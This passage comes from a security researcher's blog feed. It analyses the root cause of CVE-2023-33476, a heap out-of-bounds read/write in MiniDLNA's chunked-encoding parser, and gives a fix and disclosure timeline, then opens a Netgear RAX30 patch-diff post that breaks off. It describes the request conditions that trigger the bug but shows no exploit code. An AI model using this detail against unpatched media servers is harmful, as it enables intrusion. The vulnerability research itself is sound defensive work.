    <span class="p">{</span>
      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
    <span class="cm">/* search for the string "\r\n\r\n" */</span>
    <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
      <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
      <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">res_buf</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">res_buf</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>

<p>After a few days of fuzzing, tweaking the harnesses, and fuzzing some more, I had come across a
handful of crashes that seemed somewhat promising. Among them was this one.</p>

<p>An interesting side note here: thanks to Netgear’s terrible practices with their GPL code releases,
it turned out that the actual device I was testing against (RAX45) was not only running a newer version
than the one they included in their GPL package, it was also a custom fork that apparently had fixed
these bugs already. I confirmed this by reversing the binary taken straight from the device. Maybe
its just me, but its nuts that they’re fixing vulnerabilities in their internal forks of open source
code and not providing those fixes in their GPL packages, let alone pushing them upstream. After
discovering this I decided to pivot to just focusing on the latest code from MiniDLNA Git repo and
confirmed that version was vulnerable as well.</p>

<h2 id="root-cause-analysis">Root Cause Analysis</h2>

<p>The vulnerable code is reached for any valid request that includes the
<code class="language-plaintext highlighter-rouge">Transfer-Encoding:chunked</code> HTTP header and that meets the following conditions:</p>

<ul>
  <li>Correctly terminates the HTTP headers with <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence</li>
  <li>Includes a terminator chunk at the end of the request body with a chunk size of 0</li>
  <li>Correctly follows chunk size values with terminator sequence <code class="language-plaintext highlighter-rouge">\r\n</code></li>
</ul>

<p>The function call chain is shown below, beginning in <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code> (<code class="language-plaintext highlighter-rouge">upnphttp.c:1096</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Process_upnphttp() →
    ProcessHttpQuery_upnphttp(h) →
        ParseHttpHeaders(h) ← (returns)
    ProcessHttpQuery_upnphttp(h) -- VULNERABLE CODE
</code></pre></div></div>

<h3 id="initial-request-handling-process_upnphttp">Initial Request Handling: Process_upnphttp()</h3>
<p>The code responsible for the initial reception and processing of requests is in <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code>
and is described below.</p>

<p><strong><code class="language-plaintext highlighter-rouge">Process_upnphttp(), upnphttp.c:1096</code></strong></p>

<p>Data is read from the socket using <code class="language-plaintext highlighter-rouge">recv()</code>, up to 2048 bytes at a time, into a static 2048-byte
char buffer. If data is received, the code calculates <code class="language-plaintext highlighter-rouge">new_req_buflen</code> as <code class="language-plaintext highlighter-rouge">req_buflen + bytes_recv'd</code>
and checks whether the new buffer length would exceed a max value of 1MB. If so, an error is return;
otherwise the code continues.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="n">h</span> <span class="o">=</span> <span class="n">ev</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">2048</span><span class="p">];</span>
    <span class="p">[...]</span>
    <span class="p">{</span>
        <span class="kt">int</span> <span class="n">new_req_buflen</span><span class="p">;</span>
        <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">endheaders</span><span class="p">;</span>

        <span class="c1">// new buf_len is the sum of the last calculated red_buflen and the</span>
        <span class="c1">// number of bytes the call to `recv` returned</span>
        <span class="n">new_req_buflen</span> <span class="o">=</span> <span class="n">n</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

        <span class="c1">// check to see if the new buf len exceeds a max value (1MB)</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">new_req_buflen</span> <span class="o">&gt;=</span> <span class="mi">1024</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">DPRINTF</span><span class="p">(</span><span class="n">E_ERROR</span><span class="p">,</span> <span class="n">L_HTTP</span><span class="p">,</span> <span class="s">"Receive headers too large (received %d bytes)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">new_req_buflen</span><span class="p">);</span>
            <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Further down in this function, <code class="language-plaintext highlighter-rouge">realloc()</code> is called using the calculated <code class="language-plaintext highlighter-rouge">new_req_buflen</code> as the
size and passing the pointer<code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> as the buffer to perform the reallocation on. On the first
round of processing (i.e. the first 2048 bytes received) <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> will be NULL and <code class="language-plaintext highlighter-rouge">realloc()</code>
behaves like a normal call to <code class="language-plaintext highlighter-rouge">malloc()</code>. The data is copied from the static buffer into the buffer pointed to by <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> and the
<code class="language-plaintext highlighter-rouge">h-&gt;req_buflen</code> field of the upnphttp struct is updated with the new size.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">realloc</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="n">new_req_buflen</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">)</span>
                <span class="p">{</span>
                    <span class="n">DPRINTF</span><span class="p">(</span><span class="n">E_ERROR</span><span class="p">,</span> <span class="n">L_HTTP</span><span class="p">,</span> <span class="s">"Receive headers: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
                    <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
                    <span class="k">break</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// copy n bytes from the local `buf[2048]` to the alloc'ed memory</span>
                <span class="c1">// req_buflen will be 0 on the first round of processing since it's not updated</span>
                <span class="c1">// until the next line.</span>
                <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
                <span class="c1">// update req_buflen</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+=</span> <span class="n">n</span><span class="p">;</span>

</code></pre></div></div>

<p>Next, the buffer is null terminated and then passed to <code class="language-plaintext highlighter-rouge">strstr()</code> to search for an <code class="language-plaintext highlighter-rouge">\r\n\r\n</code>
sequence to determine whether the full HTTP headers section of the request has been received. Upon
finding this sequence, the start of the request body and it’s size are also calculated and the
respective values in the <code class="language-plaintext highlighter-rouge">upnphttp</code> struct (<code class="language-plaintext highlighter-rouge">req_contentoff</code> and <code class="language-plaintext highlighter-rouge">req_contentlen</code>) are updated. The
code then calls <code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> to move onto parsing.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>            <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>

            <span class="c1">// search for the string "\r\n\r\n" and calculate content offset and content length if</span>
            <span class="c1">// found</span>
            <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>

            <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
            <span class="p">{</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
                <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
</code></pre></div></div>

<p>NOTE: The headers have only been read into <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> at this point without parsing; they will be
parsed into fields of the <code class="language-plaintext highlighter-rouge">upnphttp</code> struct within the call to <code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> at the
end of this code block.</p>

<p><strong><code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code></strong>:</p>

<p>The first call to this function only happens once the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence is found, indicating the
end of the HTTP header section was received. After parsing the HTTP verb and path, it calls
<code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> to perform the actual parsing of the header data before doing anything else;
<strong>the source of the vulnerability is found here.</strong></p>

<p>When <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> returns and indicates the full request was recieved by setting
<code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> to 0, processing of the chunks in the HTTP body will resume in
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code>; this is where the corruption caused by the bug is triggered when
<code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is passed to <code class="language-plaintext highlighter-rouge">memmove()</code> without validating that it does not exceed the allocated
buffer.</p>

<h3 id="bug-incorrect-chunk-size-validation-in-parsehttpheaders">BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()</h3>

<p>After reading data from the socket and finding the end of the HTTP header section as
indicated by the presence of the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence, <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code> passes the request
off to <code class="language-plaintext highlighter-rouge">ParseHttpQuery_upnphttp()</code>, which in turn calls <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> to perform the actual
parsing of the header data into a <code class="language-plaintext highlighter-rouge">upnphttp</code> struct. If the HTTP headers contain the
<code class="language-plaintext highlighter-rouge">Transfer-Encoding:chunked</code> header, a flag is set on the structure which will result in the
application reaching the vulnerable code on line 428.</p>

<p>After some rudimentary sanity checks of the <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and <code class="language-plaintext highlighter-rouge">h-&gt;req_contentoff</code> fields of the
struct, the code iterates through the rest of the request body, attempting to read the numeric size
values for each of the chunks at the expected offsets based on sizes read. It combines the step of
reading the size value and attempting to perform the size validation inside the conditions of the
following while loop:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span><span class="p">(</span> <span class="p">(</span><span class="n">line</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
           <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
           <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">line</span><span class="p">)</span> <span class="p">)</span>
</code></pre></div></div>

<p>The following checks are performed:</p>
<ul>
  <li>Checks if the char ptr <code class="language-plaintext highlighter-rouge">line</code> has been incremented past the end of the allocation in <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>.
<code class="language-plaintext highlighter-rouge">line</code> is incremented by the parsed <code class="language-plaintext highlighter-rouge">req_chunklen</code> at the end of the inner block of the while loop.</li>
  <li>Attempt to parse a size value using <code class="language-plaintext highlighter-rouge">strtol()</code> and ensure the value is greater than 0;</li>
  <li>Ensure the char pointer <code class="language-plaintext highlighter-rouge">endptr</code> is not pointing to the same location as <code class="language-plaintext highlighter-rouge">line</code> after the call to
<code class="language-plaintext highlighter-rouge">strtol()</code> which indicates no parsable digit was found.</li>
</ul>

<p>The bug occurs in the evaluation of the second condition, where <code class="language-plaintext highlighter-rouge">strtol()</code> is called; the intent is
for the return value of <code class="language-plaintext highlighter-rouge">strtol()</code> to be saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and to compare the saved
value to 0 for the validation step. Instead, the result of the comparison expression
<code class="language-plaintext highlighter-rouge">strtol(x,x) &gt; 0</code> is saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code>, resulting in the incorrect calculation of the total
expected request size as the Boolean result of the expression would evaluate to 1 for all
numbers greater than 0.</p>

<p>Within the inner block of the while loop, the value saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is used to increment
the <code class="language-plaintext highlighter-rouge">line</code> pointer to the location where the next chunk size is expected, indicating the true
intent of the code (comments added for annotation).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// if strtol() returned a size greater than 0, `line` will only ever be incremented</span>
        <span class="c1">// by 1 (the bool eval of the comparison in int) at most, which means the first validation</span>
        <span class="c1">// condition in the while loop will not properly detect large values that exceed the size</span>
        <span class="c1">// of the request buffer allocation</span>
        <span class="n">line</span> <span class="o">=</span> <span class="n">endptr</span><span class="o">+</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="o">+</span><span class="mi">2</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>This means that even for very large chunk sizes, the <code class="language-plaintext highlighter-rouge">line</code> pointer will only ever be incremented
by 1 at most for each iteration through the loop, meaning the validation check in the first
condition of the while loop will not be triggered and catch these sizes that exceed the length of
data sent in the request body.</p>

<h3 id="oob-readwrite-on-chunk-sizes--request-length-in-processhttpquery_upnphttp">OOB read/write on chunk sizes &gt; request length in ProcessHttpQuery_upnphttp()</h3>

<p>After the headers have been parsed in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>, execution returns to
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code>, where the value saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is checked; if it is 0
after the request header parsing, it is assumed that the full request has been received and that
the request buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> is large enough to fit all the expected data based on chunk
sizes.</p>

<p>Parsing of the actual chunks from the request body then continues in the code block below
(upnphttp.c:893) after returning from <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="o">*</span><span class="n">chunkstart</span><span class="p">,</span> <span class="o">*</span><span class="n">chunk</span><span class="p">,</span> <span class="o">*</span><span class="n">endptr</span><span class="p">,</span> <span class="o">*</span><span class="n">endbuf</span><span class="p">;</span>
    <span class="c1">// chunk, endbuf, and chunkstart all begin pointing to the start of the http request body</span>
    <span class="n">chunk</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">=</span> <span class="n">chunkstart</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>

    <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">Send400</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="c1">// this call to memmove will use the chunklen parsed by strol() above</span>
        <span class="c1">// without checking that it doesn't read beyond the end of the request buf.</span>
        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>

        <span class="n">endbuf</span> <span class="o">+=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">endptr</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">-</span> <span class="n">chunkstart</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
</code></pre></div></div>

<p>Summary of while loop conditions/checks:</p>
<ul>
  <li>Condition 1:
    <ul>
      <li>Attempt to parse a chunk size number as a <code class="language-plaintext highlighter-rouge">long</code> using <code class="language-plaintext highlighter-rouge">strtol()</code>, passing in the <code class="language-plaintext highlighter-rouge">chunk</code>
  pointer which begins the while loop pointing to the start of the request body section
  (immediately following the headers). The number will be parsed as base 16, meaning hex digits
  A-F are considered valid.</li>
      <li>The return value of the call to <code class="language-plaintext highlighter-rouge">strtol()</code> is saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and a comparison is
  performed to check whether it is greater than 0; this must evaluate true for the parsing
  to continue</li>
    </ul>
  </li>
  <li>Condition 2:
    <ul>
      <li>Check that the value that <code class="language-plaintext highlighter-rouge">strtol()</code> saved to <code class="language-plaintext highlighter-rouge">endptr</code> does not point to the same place as
  <code class="language-plaintext highlighter-rouge">chunk</code>, which would indicate that no valid numeric value could be parsed from the string.</li>
    </ul>
  </li>
</ul>

<p>The code in this block relies on the validation performed during the header parsing step and so it
parses and uses the user-controlled chunk size as the size argument in calls to <code class="language-plaintext highlighter-rouge">memmove()</code> without
bounds checking. <strong>This results in the application accepting chunk size values that exceed the
number of bytes received in the request, leading to an OOB read/write.</strong></p>

<p>The <code class="language-plaintext highlighter-rouge">while</code> loop used to iterate through the chunks in this block is nearly identical
to the one in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code>, except this one includes an additional set of parentheses
around the assignment and comparison expressions in the call to <code class="language-plaintext highlighter-rouge">strtol()</code>, resulting in the
correct assignment of the return value to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code>. Had the same bug present in the
<code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> chunk size parsing code been introduced here, it would have probably been
noticed much sooner as chunks would likely get truncated as a result of the incorrect logic.</p>

<h2 id="conclusion">Conclusion</h2>

<h3 id="suggested-fix">Suggested Fix</h3>

<p>The issue can be fixed by wrapping the assignment expression in the second condition of the while
loop in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> (upnphttp.c:150) used to validate chunk sizes in parentheses to correctly
separate the assignment from the comparison expression that compares the value to 0.</p>

<p>The fixed code would be:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span> <span class="p">((</span><span class="n">line</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
           <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="c1">// FIX HERE</span>
           <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">line</span><span class="p">)</span> <span class="p">)</span>
</code></pre></div></div>

<p>A patch with this fix was provided to the package maintainer along with the vulnerability report.</p>

<h3 id="disclosure-timeline">Disclosure Timeline</h3>

<ul>
  <li>2023-04-18: Submitted vulnerability report to Zero Day Initiative RE: vulnerable Netgear RAX30</li>
  <li>2023-05-04: ZDI rejects the vulnerability report (not interested in the product)</li>
  <li>2023-05-05: Request a CVE ID from Mitre</li>
  <li>2023-05-05: Unable to find a private avenue to report to the package maintainer directly, so instead submit
reports to Debian and Ubuntu security teams since they have vuln versions in their repos</li>
  <li>2023-05-08: Debian security team shares the email address of the package maintainer; reach out to
them over email and submit a private bug report on the Sourceforge page.</li>
  <li>2023-05-08: Package maintainer acknowledges report and begins working on fix</li>
  <li>2023-05-31: Package maintainer releases fixed version, 1.3.3</li>
  <li>2023-05-31: Follow up message to Mitre, CVE assignment pending</li>
  <li>2023-06-02: Mitre assigns the vulnerability CVE-2023-33476</li>
</ul>

<h3 id="exploitation">Exploitation</h3>

<p>As this is a heap-based vulnerability, exploitability of this issue will be dependent upon the
Glibc version the application is linked against and compiler exploit mitigations, to some extent.
Ultimately, because the bug provides for a strong read/write primitive, there are various options
for exploitation.</p>

<p><strong>Part 2 of this series going over the exploit development process and the exploits I wrote for this bug
can be found <a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a>.</strong></p>

<h3 id="referencelinks">Reference/Links</h3>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2023-33476">Exploits</a></li>
  <li><a href="https://sourceforge.net/projects/minidlna/files/">MiniDLNA Project Home</a></li>
  <li><a href="https://sourceforge.net/p/minidlna/git/ci/9bd58553fae5aef3e6dd22f51642d2c851225aec/">Bug fix commit</a></li>
  <li><a href="https://sourceforge.net/p/minidlna/bugs/355/">Original Git issue where bug was reported</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33476">Mitre: CVE-2023-33476</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-33476">NIST National Vulnerability Database: CVE-2023-33476</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0day" /><category term="disclosure" /><category term="minidlna" /><category term="exploit" /><category term="cve-2023-33476" /><summary type="html"><![CDATA[first part in a two-part series going over a heap overflow in MiniDLNA, a media server commonly deployed in embedded environments. this post provides a summary and root cause analysis of the vulnerability.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/minidlna-1.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/minidlna-1.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">RAX30 Patch Diff Analysis &amp;amp; Nday Exploit for ZDI-23-496</title><link href="https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis.html" rel="alternate" type="text/html" title="RAX30 Patch Diff Analysis &amp;amp; Nday Exploit for ZDI-23-496" /><published>2023-05-12T00:00:00+00:00</published><updated>2023-05-12T00:00:00+00:00</updated><id>https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis</id><content type="html" xml:base="https://blog.coffinsec.com/nday/2023/05/12/rax30-patchdiff-nday-analysis.html"><![CDATA[<p>Having recently spent some time working on an exploit for an 0day I’d found on the RAX30, the recent release of a few ZDI advisories for this device caught my attention. I took a quick look to confirm there weren’t any collisions with my bug, and after confirming this wasn’t the case (phew!), I decided to use this as an opportunity to do some patch diff analysis and see if there were any bugs worth writing exploits for.</p>

<h2 id="overview">Overview</h2>

<p><strong>Target bugs:</strong></p>

<ul>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-499/">ZDI-23-499:</a> <code class="language-plaintext highlighter-rouge">soap_serverd</code> buffer overflow</li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-496/">ZDI-23-496</a>: <code class="language-plaintext highlighter-rouge">lighttpd</code> misconfiguration -&gt; RCE</li>
</ul>

<p><strong>Target firmware versions:</strong></p>

<ul>
  <li>Prepatch: 1.0.9</li>
  <li>Patched: 1.0.10</li>
</ul>

<h2 id="analysis">Analysis</h2>

<h3 id="zdi-23-499-soap_serverd-stack-based-buffer-overflow">ZDI-23-499: soap_serverd stack-based buffer overflow</h3>

<p>The description of this bug says the flaw occurs because “when parsing SOAP message headers, the process does not properly validate user supplied data before copying it to a fixed-length stack buffer.” Based on my previous experience with Netgear and specifically their SOAP server implementations, I had a pretty good idea where to look. In fact, I even a hunch that this was the same/similar to a bug I’d found on another Netgear device last year, and so before spending much time going through the diff’ed binaries, I did a quick search for references to <code class="language-plaintext highlighter-rouge">sscanf</code> in the patched and nonpatched versions and pretty easily identified where the bug occured. Interestingly, this bug is very similar but also unique to the issue I’d previously found – leave it to Netgear to ship two unique vulnerabilities using the same vulnerable C functions and in code that processes the same data lol.</p>

<p>The bug is caused by use of <code class="language-plaintext highlighter-rouge">sscanf()</code> without supplying length-limit values in the format string. The vulnerable version of the code attempts to parse out the HTTP method, path, and HTTP version string from the header using the following code:</p>

